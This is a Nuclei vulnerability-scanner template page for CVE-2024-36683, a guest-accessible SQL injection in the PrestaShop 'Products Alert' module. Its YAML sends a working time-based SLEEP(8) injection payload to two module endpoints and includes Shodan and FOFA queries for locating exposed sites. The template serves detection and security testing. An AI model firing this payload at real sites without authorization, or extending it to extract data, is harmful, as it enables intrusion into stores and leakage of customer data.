Skip to content
Nuclei Templates

PrestaShop productsalert - SQL Injection

ID: CVE-2024-36683

Severity: critical

Author: mastercho

Tags: time-based-sqli,cve,cve2023,prestashop,sqli,productsalert

Description

Section titled “Description”

In the module ‘Products Alert’ (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.

YAML Source

Section titled “YAML Source”
id: CVE-2024-36683


info:
  name: PrestaShop productsalert - SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
    - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36683
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-36683
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
  metadata:
    verified: true
    max-request: 2
    framework: prestashop
    shodan-query: html:"/productsalert"
    fofa-query: body="/productsalert"
  tags: time-based-sqli,cve,cve2023,prestashop,sqli,productsalert


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(tolower(body), "productsalert", "prestashop")'
        condition: and
        internal: true


  - raw:
      - |
        @timeout: 30s
        POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158


      - |
        @timeout: 30s
        POST /module/productsalert/AjaxProcess HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pid=13158


    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers-condition: or
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_1>=8 && status_code_1 != 404'
          - 'duration_2>=8 && status_code_2 != 404'
        condition: or
# digest: 4a0a00473045022012b999c45fc38e3f6aebc851ad2bcd5c429d6f4bcfaddb3dc5e2823807f24c22022100e48847da480c67acb082fb9d28999255962f2789672b611313b2ec2f46ebd837:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36683.yaml"

View on Github